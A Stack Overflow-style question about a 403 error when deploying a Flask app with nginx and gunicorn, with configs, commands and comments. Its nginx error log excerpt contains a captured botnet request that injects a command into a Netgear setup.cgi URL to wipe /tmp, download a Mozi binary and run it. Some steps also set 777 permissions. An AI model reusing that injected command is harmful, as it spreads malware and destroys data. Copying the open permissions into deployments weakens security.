# Error 403 on deploying flask website with nginx

Tags: nginx, flask

I have a flask website running fine in a flask development server at http://0.0.0.0:8080. I need to deploy it to my university server. I have the public IP of the server, and I mapped it to my domain I bought from freenom.com.
[image]

I am new to nginx. I referred to [this](https://medium.com/faun/deploy-flask-app-with-nginx-using-gunicorn-7fda4f50066a) and [this](https://www.digitalocean.com/community/tutorials/how-to-serve-flask-applications-with-uswgi-and-nginx-on-ubuntu-18-04) to deploy the website.

now I am getting *error 403 You don't have permission to access / on this server* when I try to open the website in the browser.

My project structure is:

```
myproject
|________ app.py
|________ app.sock
|________ wsgi.py
|________ app.ini
|________ templates
          |__________ index.html
```

app.py ends with `app.run(host="0.0.0.0", port=8080, debug=True)`. The file wsgi.py is exactly same as the one mentioned in the references.

**app.ini** contains

```
[uwsgi]
module = wsgi:app

master = true
processes = 5

socket = app.sock
chmod-socket = 660
vacuum = true

die-on-term = true
```

The file /etc/systemd/system/**app.service** contains

```
[Unit]
Description=Gunicorn instance to serve myprojects
After=network.target

[Service]
User=my_username_on_server
Group=www-data

WorkingDirectory=/home/my_username_on_server/git/myproject
Environment="PATH=/home/my_username_on_server/ritwikEnvs/myproject/bin"

ExecStart=/home/my_username_on_server/ritwikEnvs/myproject/bin/gunicorn --bind 0.0.0.0:8080 wsgi:app
# I also tried the following
# ExecStart=/home/my_username_on_server/ritwikEnvs/myproject/bin/gunicorn --workers 3 --bind unix:app.sock -m 007 wsgi:app
# ExecStart=/home/my_username_on_server/ritwikEnvs/myproject/bin/uwsgi --ini app.ini 

[Install]
WantedBy=multi-user.target
```

When I execute `sudo systemctl start app`, the app.sock file is created automatically.

/etc/nginx/sites-available/**app** contains

```
server {
    listen 80;
# tried this also
# listen 0.0.0.0;
# listen 127.0.0.1
    server_name mydomainname.ml www.mydomainname.ml;
# tried this also
# server_name localhost

location / {
  include proxy_params;
  proxy_pass http://0.0.0.0:8080;
# i also tried with
# proxy_pass http://127.0.0.1:8080;
# proxy_pass http://public_IP_of_server:8080;
# proxy_pass http://unix:/home/my_username_on_server/git/myproject/app.sock;
# uwsgi_pass unix:/home/my_username_on_server/git/myproject/app.sock;
# uwsgi_pass unix:///home/my_username_on_server/git/myproject/app.sock;
    }
}
```

/etc/nginx/**nginx.conf** contains

```
user www-data;
worker_processes auto;
pid /run/nginx.pid;
include /etc/nginx/modules-enabled/*.conf;

events {
        worker_connections 768;
        # multi_accept on;
}

http {
        client_max_body_size 100M;
        ##
        # Basic Settings
        ##

        sendfile on;
        tcp_nopush on;
        tcp_nodelay on;
        keepalive_timeout 65;
        types_hash_max_size 2048;
        # server_tokens off;

        # server_names_hash_bucket_size 64;
        # server_name_in_redirect off;

        include /etc/nginx/mime.types;
        default_type application/octet-stream;

        ##
        # SSL Settings
        ##

        ssl_protocols TLSv1 TLSv1.1 TLSv1.2; # Dropping SSLv3, ref: POODLE
        ssl_prefer_server_ciphers on;

        ##
        # Logging Settings
        ##

        access_log /var/log/nginx/access.log;
        error_log /var/log/nginx/error.log;

        ##
        # Gzip Settings
        ##
        gzip on;

        # gzip_vary on;
        # gzip_proxied any;
        # gzip_comp_level 6;
        # gzip_buffers 16 8k;
        # gzip_http_version 1.1;
        # gzip_types text/plain text/css application/json application/javascript text/xml application/xml application/xml+rss text/javascript;

        ##
        # Virtual Host Configs
        ##

        include /etc/nginx/conf.d/*.conf;
        include /etc/nginx/sites-enabled/*;
}


#mail {
#       # See sample authentication script at:
#       # http://wiki.nginx.org/ImapAuthenticateWithApachePhpScript
# 
#       # auth_http localhost/auth.php;
#       # pop3_capabilities "TOP" "USER";
#       # imap_capabilities "IMAP4rev1" "UIDPLUS";
# 
#       server {
#               listen     localhost:110;
#               protocol   pop3;
#               proxy      on;
#       }
# 
#       server {
#               listen     localhost:143;
#               protocol   imap;
#               proxy      on;
#       }
#}
```

Then I make the soft link by `sudo ln -s /etc/nginx/sites-available/app /etc/nginx/sites-enabled`

Then

```
$ sudo nginx -t

nginx: the configuration file /etc/nginx/nginx.conf syntax is ok
nginx: configuration file /etc/nginx/nginx.conf test is successful

$ sudo systemctl restart nginx
$ sudo ufw allow 'Nginx Full'
```

I tried changing the permissions:

```
sudo chmod -R 777 /home/my_username_on_server/git/myproject/templates/index.html
sudo chown -R sat:www-data /home/my_username_on_server/git/myproject/templates/index.html
sudo chown -R www-data:www-data /usr/share/nginx/html/*
sudo chmod -R 0755 /usr/share/nginx/html/*
```

Nothing helped.

The flask website is running fine

```
$ sudo systemctl status app

● app.service - Gunicorn instance to serve myprojects
   Loaded: loaded (/etc/systemd/system/app.service; enabled; vendor preset: enabled)
   Active: active (running) since Tue 2020-09-22 17:18:37 IST; 19min ago
 Main PID: 6437 (gunicorn)
    Tasks: 82 (limit: 19660)
   CGroup: /system.slice/app.service
           ├─6437 /home/my_username_on_server/ritwikEnvs/myproject/bin/python /home/my_username_on_server/ritwikEnvs/myproject/bin/gunicorn --bind 0.0.0.0:8080 wsgi:app
           └─6463 /home/my_username_on_server/ritwikEnvs/myproject/bin/python /home/my_username_on_server/ritwikEnvs/myproject/bin/gunicorn --bind 0.0.0.0:8080 wsgi:app
... ... <console statements which proves that website is running>
```

```
$ curl -XGET http://0.0.0.0:8080 

<shows the source code of index.html>
```

Logs

```
$ sudo cat /var/log/nginx/error.log | grep mydomainname

2020/09/22 13:55:47 [error] 4261#4261: *1 connect() failed (111: Connection refused) while connecting to upstream, client: 202.83.45.214, server: mydomainname.ml, request: "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0", upstream: "http://0.0.0.0:8080/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1"
```

**Update**: it seems the issue was in the domain name service I was using. It was not able to redirect the requests to public_IP of my server. I used a paid service, and it started working. Rule of thumb: use a good+paid domain service provider.

Comment: could you try 127.0.0.1:8080 in your proxy_pass directive or private_ip_of_server:8080 with proxy_pass. Also if you want to go with a unix socket. Check the permissions of the app.sock file and if nginx can access it.

Comment: @LukasRäpple tried both, didn't work. Changed the app.sock permission with ```sudo chmod -R 777 app.sock```, didn't help.

Comment: The error you quoted: "You don't have permission to access / on this server" does not come from nginx. It looks like an Apache error. Check you entered the DNS settings correctly and that you do not have unexpected software on your server.

Comment: @MichaelHampton sir it seems apache is not even installed on the server. Yet, the server is currently hosting other websites (not written with flask)  of my colleagues. They gave me the public_IP of the server which I entered into the DNS. Should apache be installed? Is it absolutely necessary?

Comment: Apache is not necessary, so the question is, why is it there?

Comment: @MichaelHampton I don't know